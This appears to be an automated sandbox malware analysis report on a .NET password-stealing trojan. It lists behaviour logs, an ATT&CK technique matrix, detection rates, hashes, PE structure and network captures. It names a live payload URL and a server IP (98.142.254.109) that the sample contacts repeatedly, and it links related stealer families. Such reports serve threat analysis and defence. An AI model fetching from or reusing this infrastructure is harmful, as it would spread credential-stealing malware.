Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -95092s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -94984s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -94874s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -94765s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -94656s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -94547s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exe TID: 5772Thread sleep time: -94437s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 100000Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 99859Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 99750Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 99640Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 99530Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 99421Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 99312Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 99203Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 99093Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 98984Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 98874Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 98685Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 98577Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 98438Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 98275Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 98171Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 98051Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 97937Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 97827Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 97718Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 97609Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 97499Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 97390Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 97281Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 97171Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 97062Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 96952Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 96843Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 96734Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 96624Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 96515Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 96405Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 96296Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 96187Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 96077Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 95968Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 95859Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 95749Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 95640Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 95531Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 95421Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 95203Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 95092Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 94984Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 94874Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 94765Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 94656Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 94547Jump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeThread delayed: delay time: 94437Jump to behavior
Source: Copy60330548196.exe, 00000000.00000002.3910279380.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
Source: C:\Users\user\Desktop\Copy60330548196.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeQueries volume information: C:\Users\user\Desktop\Copy60330548196.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Copy60330548196.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
Virtualization/Sandbox Evasion
LSASS Memory31
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Software Packing
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS12
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Copy60330548196.exe70%VirustotalBrowse
Copy60330548196.exe61%ReversingLabsWin32.Trojan.Jalapeno
Copy60330548196.exe100%AviraTR/AVI.PWS.Agent.vkkfn
Copy60330548196.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://ocsp.thawte.com00%URL Reputationsafe
http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
http://98.142.254.109/ii/Meqvrjzz.wav14%VirustotalBrowse
http://98.142.254.1095%VirustotalBrowse
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://98.142.254.109/ii/Meqvrjzz.wavfalseunknown
NameSourceMaliciousAntivirus DetectionReputation
http://98.142.254.109/ii/Meqvrjzz.wavtCopy60330548196.exe, 00000000.00000002.3911013213.0000000002AD1000.00000004.00000800.00020000.00000000.sdmpfalse
    unknown
    http://98.142.254.109Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B37000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    http://crl.thawte.com/ThawteTimestampingCA.crl0Copy60330548196.exefalse
    • URL Reputation: safe
    unknown
    http://schemas.xmlsoap.org/soap/encoding/Copy60330548196.exefalse
    • URL Reputation: safe
    unknown
    http://98.142.254.109DCopy60330548196.exe, 00000000.00000002.3911013213.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B8E000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B82000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002BC4000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B96000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B37000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B5C000.00000004.00000800.00020000.00000000.sdmpfalse
      unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCopy60330548196.exe, 00000000.00000002.3911013213.0000000002B37000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      http://ocsp.thawte.com0Copy60330548196.exefalse
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      http://98.142.254.109/ii/Meqvrjzz.wavPCopy60330548196.exe, 00000000.00000002.3911013213.0000000002BD4000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B8E000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B82000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B9C000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B96000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002B37000.00000004.00000800.00020000.00000000.sdmp, Copy60330548196.exe, 00000000.00000002.3911013213.0000000002BCC000.00000004.00000800.00020000.00000000.sdmpfalse
        unknown
        http://schemas.xmlsoap.org/soap/envelope/Copy60330548196.exefalse
        • URL Reputation: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        98.142.254.109
        unknownCanada
        30407VELCOMCAfalse
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1526377
        Start date and time:2024-10-05 14:36:09 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 6m 21s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:6
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:Copy60330548196.exe
        Detection:MAL
        Classification:mal76.evad.winEXE@1/0@0/1
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 13
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Override analysis time to 240000 for current running targets taking high CPU consumption
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Execution Graph export aborted for target Copy60330548196.exe, PID 7144 because it is empty
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        TimeTypeDescription
        08:37:15API Interceptor11355693x Sleep call for process: Copy60330548196.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        98.142.254.109IMG_579710265.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 98.142.254.109/rr/Pmhjlkp.dat
        Doc1504210_56507_030.exeGet hashmaliciousUnknownBrowse
        • 98.142.254.109/ii/Wucmqwi.mp3
        Doc1504210_56507_030.exeGet hashmaliciousUnknownBrowse
        • 98.142.254.109/ii/Wucmqwi.mp3
        IMG_011160528.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 98.142.254.109/rr/Zcatewwlf.vdf
        IMG79600253.exeGet hashmaliciousAzorult, PureLog StealerBrowse
        • 98.142.254.109/rr/Xnssdolht.mp3
        SecuriteInfo.com.Program.Unwanted.4610.18191.4524.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 98.142.254.109/rr/Czyhiwuzcb.dat
        Copy#1905208.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 98.142.254.109/ii/Cgpubn.wav
        Copy00106258873.exeGet hashmaliciousAgentTesla, AsyncRAT, PureLog StealerBrowse
        • 98.142.254.109/ii/Bmqsvcj.mp3
        Receipt05012PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 98.142.254.109/ii/Ytqsos.dat
        Copy#501326617.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 98.142.254.109/ii/Bnmlsytdwby.mp3
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        VELCOMCAMGJBbT28p7.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
        • 104.234.204.76
        670un9Ls5U.vbsGet hashmaliciousXWormBrowse
        • 104.234.204.76
        LCfvMBneAT.ps1Get hashmaliciousPureLog Stealer, XWormBrowse
        • 104.234.204.76
        NxyRj26Cuc.ps1Get hashmaliciousXWormBrowse
        • 104.234.204.76
        Document-660117765723.wsfGet hashmaliciousXWormBrowse
        • 104.234.204.76
        Document-660107592844.wsfGet hashmaliciousXWormBrowse
        • 104.234.204.76
        hhs.exeGet hashmaliciousUnknownBrowse
        • 104.234.25.56
        sora.arm7.elfGet hashmaliciousMiraiBrowse
        • 104.234.98.121
        93aa308ad98dbf7a242ff3d06c2ba50ece83cbf909a17.exeGet hashmaliciousAsyncRATBrowse
        • 104.234.195.153
        IMG_579710265.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
        • 98.142.254.109
        No context
        No context
        No created / dropped files found
        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
        Entropy (8bit):6.26569728928316
        TrID:
        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
        • Win32 Executable (generic) a (10002005/4) 49.97%
        • Generic Win/DOS Executable (2004/3) 0.01%
        • DOS Executable Generic (2002/1) 0.01%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:Copy60330548196.exe
        File size:316'280 bytes
        MD5:f6059b7e84de5f51eb7c2be5874c895e
        SHA1:b9da6c67e47cb2b21125a1d0b9ba469b3b5ecacd
        SHA256:59e7fb46b2712f447bd8e6da840d2000f9f7af01c843a111c851745ec8f6a04d
        SHA512:371f44c4f2ad0cc5ee1e7bbf30073001adab40a4b987c7b78954aa776ba8ec1a03d840b974d608b4baf8791be0ea01ffb27d551d0b0e013ecb7a64ad41d94da7
        SSDEEP:3072:+eQrSMOsUMNWi54JwN7L4NnCDDRvLGmrOAOkGt6+duWA/t/SHUebbxCbGgKk12q2:+EMOs5hMstvLGtELbMUTKZLH
        TLSH:8564C5837185CC95D1432AF6C8AFC5201274BD8F9562C70E3A47BB2A54E776328AB74F
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V3Cf................................. ........@.. ....................................`................................
        Icon Hash:929296929e9e8e73
        Entrypoint:0x41c9ae
        Entrypoint Section:.text
        Digitally signed:true
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Time Stamp:0x66433356 [Tue May 14 09:48:06 2024 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:4
        OS Version Minor:0
        File Version Major:4
        File Version Minor:0
        Subsystem Version Major:4
        Subsystem Version Minor:0
        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
        Signature Valid:false
        Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
        Signature Validation Error:The digital signature of the object did not verify
        Error Number:-2146869232
        Not Before, Not After
        • 07/06/2019 20:00:00 11/06/2021 08:00:00
        Subject Chain
        • CN=PDFescape, O=PDFescape, L=Encinitas, S=California, C=US
        Version:3
        Thumbprint MD5:36083DDD2C0C94D360522774BEDA31E2
        Thumbprint SHA-1:B140BCEDA70D6A6C48C4258CC83F4ECCC96845C8
        Thumbprint SHA-256:B12E1F90FEB1A204409F736836E7BA7F078E40B3A809A73BAC08AEB658627610
        Serial:06E2870844B5FE917E3498FD2526FBCD
        Instruction
        jmp dword ptr [00402000h]
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x1c9600x4b.text
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1e0000x2f164.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x4a0000x3378
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e0000xc.reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x20000x1a9b40x1aa00b1c3abbf6fe2639ec6cb141808abaaf8False0.4222051056338028data5.40304606763096IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rsrc0x1e0000x2f1640x2f2003096e939c6d52b193e6086d504bc212aFalse0.36266992705570295data6.232769275350078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .reloc0x4e0000xc0x200dd2548ee0d7cc6ebf64e7b2f56c57559False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
        NameRVASizeTypeLanguageCountryZLIB Complexity
        RT_ICON0x1e2b00x709ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9976066597294485
        RT_ICON0x253500x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.17033893292322252
        RT_ICON0x35b780x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.271415808282531
        RT_ICON0x3f0200x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.3012014787430684
        RT_ICON0x444a80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.28259329239489844
        RT_ICON0x486d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.38558091286307056
        RT_ICON0x4ac780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.4598968105065666
        RT_ICON0x4bd200x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.5704918032786885
        RT_ICON0x4c6a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.6631205673758865
        RT_GROUP_ICON0x4cb100x84data0.7272727272727273
        RT_VERSION0x4cb940x3e4data0.4066265060240964
        RT_MANIFEST0x4cf780x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
        DLLImport
        mscoree.dll_CorExeMain
        TimestampSource PortDest PortSource IPDest IP
        Oct 5, 2024 14:37:16.876754045 CEST4971280192.168.2.998.142.254.109
        Oct 5, 2024 14:37:16.882004023 CEST804971298.142.254.109192.168.2.9
        Oct 5, 2024 14:37:16.886537075 CEST4971280192.168.2.998.142.254.109
        Oct 5, 2024 14:37:16.887181997 CEST4971280192.168.2.998.142.254.109
        Oct 5, 2024 14:37:16.892102003 CEST804971298.142.254.109192.168.2.9
        Oct 5, 2024 14:37:38.265173912 CEST804971298.142.254.109192.168.2.9
        Oct 5, 2024 14:37:38.265813112 CEST4971280192.168.2.998.142.254.109
        Oct 5, 2024 14:37:38.281457901 CEST4971280192.168.2.998.142.254.109
        Oct 5, 2024 14:37:38.282674074 CEST4971880192.168.2.998.142.254.109
        Oct 5, 2024 14:37:38.286364079 CEST804971298.142.254.109192.168.2.9
        Oct 5, 2024 14:37:38.287621021 CEST804971898.142.254.109192.168.2.9
        Oct 5, 2024 14:37:38.287766933 CEST4971880192.168.2.998.142.254.109
        Oct 5, 2024 14:37:38.288201094 CEST4971880192.168.2.998.142.254.109
        Oct 5, 2024 14:37:38.293013096 CEST804971898.142.254.109192.168.2.9
        Oct 5, 2024 14:37:59.689357996 CEST804971898.142.254.109192.168.2.9
        Oct 5, 2024 14:37:59.689439058 CEST4971880192.168.2.998.142.254.109
        Oct 5, 2024 14:37:59.690099001 CEST4971880192.168.2.998.142.254.109
        Oct 5, 2024 14:37:59.694961071 CEST804971898.142.254.109192.168.2.9
        Oct 5, 2024 14:37:59.698225021 CEST4971980192.168.2.998.142.254.109
        Oct 5, 2024 14:37:59.703099012 CEST804971998.142.254.109192.168.2.9
        Oct 5, 2024 14:37:59.703202009 CEST4971980192.168.2.998.142.254.109
        Oct 5, 2024 14:37:59.703378916 CEST4971980192.168.2.998.142.254.109
        Oct 5, 2024 14:37:59.708358049 CEST804971998.142.254.109192.168.2.9
        Oct 5, 2024 14:38:21.061821938 CEST804971998.142.254.109192.168.2.9
        Oct 5, 2024 14:38:21.061954021 CEST4971980192.168.2.998.142.254.109
        Oct 5, 2024 14:38:21.062690020 CEST4971980192.168.2.998.142.254.109
        Oct 5, 2024 14:38:21.063421011 CEST4972180192.168.2.998.142.254.109
        Oct 5, 2024 14:38:21.067465067 CEST804971998.142.254.109192.168.2.9
        Oct 5, 2024 14:38:21.072371006 CEST804972198.142.254.109192.168.2.9
        Oct 5, 2024 14:38:21.072487116 CEST4972180192.168.2.998.142.254.109
        Oct 5, 2024 14:38:21.072741985 CEST4972180192.168.2.998.142.254.109
        Oct 5, 2024 14:38:21.077554941 CEST804972198.142.254.109192.168.2.9
        Oct 5, 2024 14:38:42.421756983 CEST804972198.142.254.109192.168.2.9
        Oct 5, 2024 14:38:42.425487995 CEST4972180192.168.2.998.142.254.109
        Oct 5, 2024 14:38:42.430447102 CEST4972180192.168.2.998.142.254.109
        Oct 5, 2024 14:38:42.430447102 CEST4972280192.168.2.998.142.254.109
        Oct 5, 2024 14:38:42.436338902 CEST804972198.142.254.109192.168.2.9
        Oct 5, 2024 14:38:42.436346054 CEST804972298.142.254.109192.168.2.9
        Oct 5, 2024 14:38:42.437060118 CEST4972280192.168.2.998.142.254.109
        Oct 5, 2024 14:38:42.437316895 CEST4972280192.168.2.998.142.254.109
        Oct 5, 2024 14:38:42.443727970 CEST804972298.142.254.109192.168.2.9
        Oct 5, 2024 14:38:44.614219904 CEST4972280192.168.2.998.142.254.109
        Oct 5, 2024 14:38:44.615768909 CEST4972380192.168.2.998.142.254.109
        Oct 5, 2024 14:38:44.620698929 CEST804972398.142.254.109192.168.2.9
        Oct 5, 2024 14:38:44.624244928 CEST4972380192.168.2.998.142.254.109
        Oct 5, 2024 14:38:44.624437094 CEST4972380192.168.2.998.142.254.109
        Oct 5, 2024 14:38:44.629236937 CEST804972398.142.254.109192.168.2.9
        Oct 5, 2024 14:38:44.662103891 CEST804972298.142.254.109192.168.2.9
        Oct 5, 2024 14:38:50.066699982 CEST4972380192.168.2.998.142.254.109
        Oct 5, 2024 14:38:50.067410946 CEST4972480192.168.2.998.142.254.109
        Oct 5, 2024 14:38:50.072261095 CEST804972498.142.254.109192.168.2.9
        Oct 5, 2024 14:38:50.072350979 CEST4972480192.168.2.998.142.254.109
        Oct 5, 2024 14:38:50.072468042 CEST4972480192.168.2.998.142.254.109
        Oct 5, 2024 14:38:50.077267885 CEST804972498.142.254.109192.168.2.9
        Oct 5, 2024 14:38:50.114167929 CEST804972398.142.254.109192.168.2.9
        Oct 5, 2024 14:39:03.833051920 CEST804972298.142.254.109192.168.2.9
        Oct 5, 2024 14:39:03.833132982 CEST4972280192.168.2.998.142.254.109
        Oct 5, 2024 14:39:04.348478079 CEST4972480192.168.2.998.142.254.109
        Oct 5, 2024 14:39:04.348980904 CEST4972580192.168.2.998.142.254.109
        Oct 5, 2024 14:39:04.353825092 CEST804972598.142.254.109192.168.2.9
